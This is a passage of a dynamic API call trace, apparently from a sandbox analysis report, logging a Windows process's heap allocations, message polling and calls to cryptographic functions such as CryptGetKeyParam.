hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0175.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0175.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0175.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0175.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0175.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0175.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0175.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0175.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0175.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0175.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0175.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0175.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0175.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0175.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0175.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0175.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0175.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0175.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0175.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0175.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0175.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0175.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0175.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0175.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0175.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0175.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0175.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0175.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0175.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0175.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0175.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0175.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0175.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0175.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0175.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0175.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0175.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0175.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0175.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0175.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0175.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0175.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0175.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0175.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0175.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0175.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0175.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0175.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0175.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0175.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0175.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0175.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0175.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0175.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0175.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0175.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0175.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0175.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0175.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0175.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0175.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0175.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0175.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0175.341] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0175.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0175.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0175.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0175.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0175.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0175.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0175.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0175.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0175.343] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0175.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0175.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0175.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0175.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0175.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0175.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0175.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0175.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0175.343] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c27b8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27b8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0175.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0175.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0175.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0175.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0175.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0175.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0175.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0175.345] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0175.345] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0175.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0175.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0175.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0175.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0175.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0175.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0175.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0175.346] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.346] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.346] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.346] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.346] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.346] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.346] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0175.346] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.346] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.346] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0175.346] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.346] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.346] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0175.346] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.346] PeekMessageW (in: lpMsg=0x87e98c, 